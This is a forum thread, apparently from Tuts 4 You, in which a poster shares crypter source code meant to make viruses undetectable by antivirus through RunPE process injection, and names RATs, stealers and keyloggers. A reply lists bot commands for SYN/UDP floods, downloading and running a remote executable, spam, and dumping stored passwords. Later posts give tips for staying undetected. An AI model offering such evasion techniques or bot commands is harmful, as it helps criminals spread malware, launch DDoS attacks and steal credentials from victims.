Tuts 4 You


Hello,

I am here today with an executable that can obfuscate a virus and make it fully undetectable by anti-viruses. This executable uses RunPE techniques to inject into another process and to dump the crypted code into memory, and hence the executable's code remains undetected by anti-viruses.

These crypters are programmed by individuals and hence remain undetected most of the time. Mostly they are coded in VB or .NET, and hence you will find most of the viruses showing VB attributes during PE scans, but mostly the viruses/RATs/stealers/bots/worms are coded in Borland Delphi.

Examples:

1) RATs: cybergate, Blackshades, pixel, spynet, darkcomet etc.

2) Stealers: Istealer v6.0 (latest), Albertino, maya password stealer etc.

3) Keyloggers: Albertino, Rapzo, Irtech etc.

4) Crypters: icrypt, galaxy, blackout AIO, demon, cypherx (www.crypters.net) etc.

The sample crypter source code is attached here.

CodingNation_Crypter_Source.rar

  • 2 months later...

thanks :)

http://www.virustotal.com/file-scan/report.html?id=7d389377a5bf54147bc675df8a1ca0742991224b3c21e1ad7aa131e6b81575fc-1301452801
http://www.virustotal.com/file-scan/report.html?id=a77380725c96204df0bbad34a715358b1e193989f3e9053cefe80a73ad19816c-1301452813

I think the code below must not be present in a crypter project; this makes it behave like a bot.


hello [login]
.bai [logout]
.removeAll [removes ALL bots]
DDoS CMDs
./syn (google.com 80 1000)
./udp (google.com 80 1000) Careful might destroy bots
Download/Update
./download (http://site.com/file.exe C:\file.exe 1)
./update (????)
MSC
./msnmsg (hey is this you? www.yoursite.com)
./visit (http://site.com/)
./pstore (all pswds)
./pstoreS (./pstoreS paypal: searches paypal)
  • 2 months later...

check it..................

@Cipher: Thanks mate, but these are old goodies; I played with them when I was learning CEH. These goodies are no more; for example, in our team ICA, we don't use them like this.

Try the self mod version of Fly Crypter.

And also a nice name collection of RATs.

@ksanket: These codes are not used to make it behave like a bot; these codes are part of Trojans or stealers.

  • 1 month later...
  • Author

@Blue indian: I guess you are talking about a polymorphic engine, but still 99% of the crypters on the market use the same PE injection technique.

I dunno much about the polymorphic engine, though; still, they manage to make it FUD by adding junk code, by changing the variable names and by some advanced techniques.

  • 1 year later...

Thanks for sharing, friend, you rock!! Nice crypters collection.

